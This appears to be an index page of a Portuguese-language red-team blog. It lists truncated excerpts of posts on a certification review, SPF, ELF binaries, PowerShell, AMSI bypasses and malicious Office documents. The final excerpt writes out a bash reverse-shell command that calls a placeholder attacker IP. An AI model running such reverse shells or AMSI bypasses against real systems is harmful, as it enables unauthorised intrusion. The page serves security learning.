Acabo de realizar o treinamento Red Team Ops da Zero Point Security e a prova para a certificação associada - CRTO (Certified Red Ream Operator) desenvolvida por Daniel Duggan a.k.a rastamouse ...
De maneira simples, o Sender Policy Framework (SPF) é usado para verificar se um dado email foi enviado por um servidor autorizado pelo domínio de origem. Por que é necessário? A falta de uma en...
Fiz um treinamento na Pentester Academy que achei muito proveitoso [1] (aconselho fortemente o treinamento). Lá aprendi diversas técnicas e fiz várias anotações. Com o tempo perdi várias delas e se...
ELF é o formato de arquivos binários do Linux. É um padrão que define a estrutura que os arquivos binários devem seguir para que o sistema operacional consiga interpretar o seu conteúdo. Um arquivo...
Como o tema diz esse é um trabalho em progresso (wip) então, enquanto existir essa tag no cabeçalho não entenda como um post final. Podemos manipular o office via powershell usando o COM (Comp...
Apresento aqui duas opções: 1. Lendo variável $PSVersionTable 2. Get-Host Get-Host | Select-Object Version Veja abaixo o resultado de ambos os comandos:
AMSI Bypass Essas referências foram coletadas de alguns lugares mas em sua maioria, elas vieram deste site que também pode ser encontrado no post de links úteis. Observe na lista abaixo que variamo...
Links Úteis Alguns links úteis para o dia a dia e/ou referências que deram base para algumas pesquisas. Scanner de artefatos em vários antivirus Vários payloads para bypassar o AMSI
Documentos Maliciosos Como esse é o primeiro post falando sobre documentos maliciosos, vou descorrer um pouco mais. A ideia de criação de um documento malicioso (maldoc) começou a tomar conta ...
Reverse Shell Obviamente antes de solicitar a conexão reversar o listener deve estar aberto na porta especificada no exemplo replicado. Bash bash -i >& /dev/tcp/<Meu.IP>/9090 0>&...